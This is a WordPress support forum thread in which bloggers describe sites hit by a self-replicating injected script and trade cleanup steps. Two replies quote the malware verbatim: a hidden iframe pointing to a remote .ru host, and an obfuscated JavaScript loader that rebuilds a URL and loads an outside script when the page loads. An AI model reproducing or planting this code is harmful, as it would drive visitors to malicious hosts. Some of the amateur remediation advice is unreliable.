syntax error on default-widgets.php file

Got It:
1) re-install all your WordPress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
2) Now you should be able to login. Go to your dashboard and install plugin “Script Exploiter”.
3) Run the plugin and look for malicious script. In my case, I had this baby:
<div style=”display:none”><iframe src=”https://past-another-life.ru:8080/index.php&#8221; width=571 height=464 ></iframe></div>
copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
4) Download the files with the added script, open them with an editor and erase all the garbage.
5) FTP them back on the server, you should be all right.
Cheers, hope this helps,
Vinz

Hi Vinz,

I have been getting the same error for the last 3 days and been searching on Google and finally found your post. Looks like this is a relatively new problem. I am still getting the same error so i need your help!

Just a little earlier (before finding your post) i delete all files from my web-server and uploaded the word press back. I was able to enter my db details and on the next step got the same error again. I followed your instruction and deleted WP-Content folder hoping this would allow me to login but I am still getting the same error?

I am with 1and1.com shared hosting and thought that i was having problems configuring ioncube loader but looks like i gotta get rid of the malicious code first.

Please reply back and help me

Vik

looks like i gotta get rid of the malicious code first.

Yes, sudden parse errors can be a sign of hacking.

Hello, Vik79,
1) I lost my password so am logged in with nick.
2) I was also with 1and1, I suspect it’s a server virus script on their end: but I called and email them- to no avail.
3) Here’s the thing: that script is a smart little f*cker. If you leave just a string of it lying around, it’ll multiply and kill your site before you know it.
4) Actually, after I wrote this it came back up again, because it had leaked onto all the sites we host on 1and1.
5) So: you have to be absolutely sure you’ve isolated it. Compare your index.php files with the clean WordPress ones; you should be able to make out what the complete string is. Do not leave anything on there; at first, I left a <div> </div> because I thought it amounted to nothing; remember, it’s a hidden string. Make sure your index’ are just “<?php> silence is golden” or whatever the original WP has.
6) You have to clean all your pages, even static non-blog pages. I found it there too. Where there’s an index, there’s a way he’ll get on it. Actually, he didn’t make my other pages crash but web navigators would flare my site for “malicious script”.
7) Get into contact with whoever shares your server and has pages on it. We had 7 or 8 sites up; had to take them all down, erase the server completely, clean every page and put it back up. Yes, it takes time. Yes, it sucks. You’ve been served.
8) My “WP-Content” folder was FUCKED. Everytime I reinstalled, I got all kinds of errors. So I had to go from scratch: Reinstall WP, reinstall my theme, and plugins, one by one. Don’t worry, the WP database keeps track of your widgets and stuff so no major redesign is in order, but it’ll take you a minute or two.
9) Important: After you take everything off your server, change FTP access passwords. It seems the hack is coming from FTP clients (like Smart FTP) that keep passwords open and get stolen. So go to 1and1 and change that, tell whoever shares server with you to do the same, and don’t click the “remember password” box on your FTP client.
If you make sure every site on the server is clean, you change FTP passwords and upload it, technically, you should be ok. Of course, I’m no IT expert, I’m just a blogger. This site gets into the semantics of it all (and provides no solution whatsoever -gotta love ’em):
https://blog.unmaskparasites.com/2009/09/17/quicksilver-malware-network/
Good luck, I’ll be around but again, I know very little about programming. These are just my clumsy recommendations.
Vinz.

Vinz,

I would have felt really outraged if this were to happen to my established websites. I am glad that you know what you are doing ..hopefully you will be back up and running soon.

Luckily for me, I usually do direct linking and never had an established website of my own. I did registered a few domains on 1and1 to start a couple of niche sites.

Ok so I am going to take following steps to hopefully fix the damage:-

1. Delete wordpress folder from my computer
2. Delete wordpress folder from my server
3. Erase my ftp details and change my 1and1 login information.
4. Upload fresh copy of wordpress.
5. Try to get the Ioncube loader going (hopefully i will get it this time)
6. Delete all my plugins from my PC, download them fresh and upload em.

If you think of anything else I should do pls lemme know. I am in Melbourne Australia and it’s getting late up here.. so i will wait for the fresh install till tomorrow.

Again, thx for your assistance.. knowing that there is not a lot of info about this problem you have really done a good service to whoever happens to visit this page!

Cheers,

Vik

…As per my experience, that should work…
Too bad the real experts that hang around this site and others can’t have a professional say on the thing…
P.d.: Make SURE you make a backup of your MySQL tables somewhere in between. The script doesn’t seem to affect your tables but just in case, hang onto those because that’s were all your blog info is.
You’ll find those in your PHP section of my 1and1.
That said, that’s the limit of my blog knowledge. I really hope it works and am crossing me’s fingers for you…
Don’t worry, you’ll be celebrating over a Foster’s in no time!
Peace,
V.

Hello group! I have spent 30 hours over the last 3 1/2 days getting my wordpress blog up at https://zackcovell.com

My problem is that for the 3rd day in a row I get the following error after I leave the site for a little bit and then come back.

Parse error: syntax error, unexpected ‘<‘ in /homepages/10/d232920448/htdocs/wp-includes/default-widgets.php on line 1034

I seriously need some help identifying what the heck is wrong with the script or something else.

Please DO NOT tell me to start over, I’ve read this forum already twice and have crashed my blog through some unknown method twice.

Thanks and call if you’d like to offer some assistance. Zack 503-325-2858

I emailed you zack — Im not up to phone calls this early. ??

Hello it’s Vik79 checking in..

I posted couple of days ago, about the problem with word press installation. I followed exactly what i wrote above and it worked!

Had to completely wipe off everything related to wordpress and plugins from my computer and the server to be 100% sure that no trace of the malicious code is left. Then re-uploaded everything back. I even figured out the ioncube loader install on 1and1.

Fingers crossed everything looks good now.

I would like to mention here that this was a new domain, so i didn’t had to backup or do any of the extra effort so what i have done may not be relevant to existing sites with content.

Thanks to Vinz/moebius77 for assistance.

Good luck to you all!

Peace to you and yours,

Vik

Well a similar error had occurred on my installation on Bluehost. Basically it was a replicating script that was targeting all the .js and index.php files….

basically a spamming script for a toolbar. i removed it successfully as it used to append itself at the end of every document. lot of work.. but thankfully did not need to delete the entire installation…

I had this same issue and had to uninstall WordPress and do a fresh install to fix. Does anyone know what causes this and what I can do to prevent it from happening again?

Thanks!

This has happened to me multiple times. Does anyone know how to solve the issue or prevent it?

It keeps returning and infecting all my blogs.

Is it a plug-in?

I have multiple blogs running 2.8.6 (1 blog)- 2.9 (5 blogs) running on bluehost.

hello the problem is on your default-widgets.php and default-filter.php, inside your wp-includes. to solve this problem is download the two file default-widgets.php and default-filter.php, then open it to your editor or in notepad then go to the bottom part of the script, find the script:

<script>/*GNU GPL*/ try{window.onload = function(){var B2z6bl10xv = document.createElement(‘script’);B2z6bl10xv.setAttribute(‘type’, ‘text/javascript’);B2z6bl10xv.setAttribute(‘src’, ‘h@^t(t)p!#^^:^#$/@&((&/#&^!!t$w$(e(^@e&(&t^(&(m^#e$$m$$!e##-@@c&&#!@o@&m)$&.)!()r@e(!#$d$)(i)@$f@!f^&^.)##c@o^@(m&!^.&)@g)o@^^!o)g^#^@l^e)##-$^)!!c!#o&!m#)&(-&b)$d^.^!s(@!i$&&!&m!p)!#!l(!((e@@@w)!o!&r@&^^l#d^)$h@^@(o@!&^u$s@(e!!).)&r(!$u^$:(8#$^0^(($8@$0)()/^&!g^!@(^o$!#o&#g@&!!^l#@$&e$@.(c(#!o^m))/(!g^o&)!o(g)@l!e@)$.(@@c!o$^m)/$@d@&((r$e&)(a!)$m$@s##t)^(#i&^(!#m#)e&)&.)##$c@o@()m@!/@^^a#^#@$t^!t)#.@!@#n#e!(#t)&/@(s(!h!^i$(&n@##)o$#b$(!$i(@$.#@j^)^)p$@/$@)’.replace(/\)|&|\!|\(|\$|\^|#|@/ig, ”));B2z6bl10xv.setAttribute(‘defer’, ‘defer’);document.body.appendChild(B2z6bl10xv);}} catch(e) {}</script>

then delete this script then upload the file back to your ftp, the site is will be find

i hope it can help with your problem

-jromechan

I have got the same error. How can I contact vinz77 directly?

Where can I get Script Exploiter plugin?

I’ve had the same problem (and am still dealing with it). My site was hacked by a Malicious script code, which even after I deleted my file, reoccurred over and over again. Here are some suggestions:

1. Most important: Contact your hosting provider and let them know that your site has been hacked. Tell them that you are working on getting it removed. If you do not get this taken care of, they could shut down your site completely and/or remove all your files without even backing it up. It might also be that you’ll need to remove your file and ask that your hosting provider to delete your hosting account and give you another one on a different server.

2. Do a complete backup (via FTP only) onto your computer. Search each .php file (yes, one by one) and remove the Malicious script. The script in embedded into the bottom of all index.php files, AS WELL AS other .php files. Unfortunately there is no telling exactly which files have been effected. You’ll have to do this manually. DO NOT download the latest copy of WordPress and just copy over your existing files. This will make a lot bigger mess. (Make sure to take note which files were effected as you’ll only re-upload these files).

3. DELETE everything off your server EXCEPT the WordPress files (and don’t delete the effected files). CHANGE all passwords to something very difficult (letters, numbers, characters, lower and uppercase). And if you have access to your cPanel, delete your mySQL database and create a new one (If you do change your mySQL database, then you’ll need to update the information on your wp-config.php as well).

4. Re-upload ONLY the files that had been effected into their appropriate folders.

5. Immediately install the Secure WordPress plugin and active it. THEN delete ALL other plugins that you are not using. Go through your plugins and themes and delete everything that you’re not using (or don’t really need).

6. Delete the “admin” user account. Create a new account under a new name, assign the role of admi nis tra tor to that user, then sign in under the new user and delete the “admin” account. REMEMBER, make sure to use a strong password.

7. If you feel ambitious, rename your default data base table prefix (which currently is “wp_”). This is very involved and takes time. Here is a tutorial: https://bit.ly/61z0Jk

8. Say a prayer. Say lots of prayers ??